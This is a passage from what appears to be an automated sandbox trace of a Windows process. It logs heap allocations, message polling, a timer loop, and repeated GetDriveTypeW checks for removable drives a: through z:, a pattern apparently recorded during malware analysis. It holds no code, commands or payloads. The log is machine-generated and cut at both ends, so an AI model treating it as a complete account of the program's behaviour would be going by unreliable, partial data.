dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0222.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0222.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0222.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0222.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0222.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0222.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0222.154] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0222.154] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0222.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0222.154] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0222.154] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0222.154] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0222.154] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0222.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0222.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0222.154] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0222.154] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0222.154] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.154] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0222.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0222.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0222.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0222.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0222.155] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0222.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0222.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0222.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0222.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0222.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0222.155] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0222.155] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0222.155] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0222.155] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0222.155] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0222.155] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0222.156] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0222.156] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0222.156] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0222.156] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0222.156] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0222.156] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0222.156] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0222.157] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0222.157] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0222.157] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0222.157] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0222.157] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0222.157] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0222.157] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0222.158] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0222.158] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0222.159] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0222.159] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0222.160] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0222.160] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0222.160] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0222.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0222.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0222.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0222.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0222.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0222.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0222.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0222.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0222.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0222.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0222.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0222.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0222.161] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0222.161] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0222.161] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0222.161] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0222.161] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0222.161] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0222.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0222.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0222.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326080 [0222.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0222.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0222.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0222.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0222.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326080 | out: hHeap=0x12c0000) returned 1 [0222.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0222.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0222.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0222.162] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0222.162] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0222.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0222.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0222.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0222.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0222.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0222.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0222.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0222.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0222.162] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0222.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0222.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0222.163] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0222.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0222.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0222.163] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0222.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0222.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0222.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0222.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0222.163] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0222.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0222.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0222.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0222.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0222.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0222.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0222.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0222.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0222.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0222.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0222.163] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0222.164] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0222.164] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0222.164] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0222.164] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0222.164] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0222.164] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0222.164] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0222.165] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0222.165] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0222.165] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0222.165] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0222.165] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0222.165] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0222.165] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0222.166] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0222.166] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0222.166] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0222.166] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0222.167] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0222.167] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0222.167] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0222.167] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0222.167] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0222.167] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0222.167] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0222.168] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0222.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0222.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0222.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0222.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0222.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0222.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0222.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0222.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0222.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0222.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0222.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0222.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0222.168] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0222.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0222.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0222.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0222.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0222.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0222.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0222.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0222.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0222.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0222.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0222.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0222.169] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0222.169] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0222.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0222.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0222.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0222.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0222.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0222.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0222.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0222.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0222.170] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 1 [0222.170] TranslateMessage (lpMsg=0x7dfde4) returned 0 [0222.170] DispatchMessageW (lpMsg=0x7dfde4) returned 0x0 [0222.170] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0222.170] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0222.170] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0222.170] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0222.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0222.170] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0222.170] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0222.170] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0222.170] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0222.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0222.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0222.170] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0222.170] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318de0 [0222.170] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0222.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0222.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0222.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0222.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0222.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0222.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0222.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0222.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0222.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0222.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0222.171] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0222.171] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0222.171] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0222.171] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0222.172] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0222.172] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0222.172] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0222.172] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0222.172] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0222.172] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0222.172] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0222.173] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0222.173] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0222.173] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0222.173] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0222.173] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0222.173] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0222.173] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0222.174] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0222.174] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0222.174] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0222.174] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0222.174] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0222.174] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0222.175] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0222.175] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0222.175] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0222.175] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0222.175] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0222.175] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0222.175] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0222.175] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0222.175] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0222.175] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0222.175] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0222.175] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0222.175] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0222.175] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0222.176] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0222.176] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.176] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0222.176] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0222.176] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0222.176] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0222.176] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0222.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0222.176] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0222.176] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0222.176] HeapFree (in: hHeap=0x12c0000, 